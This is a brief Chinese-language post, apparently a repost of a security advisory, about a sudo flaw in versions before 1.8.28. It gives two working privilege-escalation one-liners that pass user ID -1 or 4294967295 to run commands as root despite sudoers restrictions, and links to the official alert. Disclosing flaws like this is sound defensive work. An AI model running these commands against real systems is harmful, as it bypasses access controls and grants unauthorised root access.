sudo 中的一个错误允许您以 root 身份执行任何可执行文件(如果 /etc/sudoers 允许其他用户执行该文件并且禁止 root 执行)。
该错误的利用非常简单:
sudo -u#-1 id -u
或:
sudo -u#4294967295 id -u
该错误存在于 1.8.28 之前的所有 sudo 版本中
联系方式:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
来源: linux.org.ru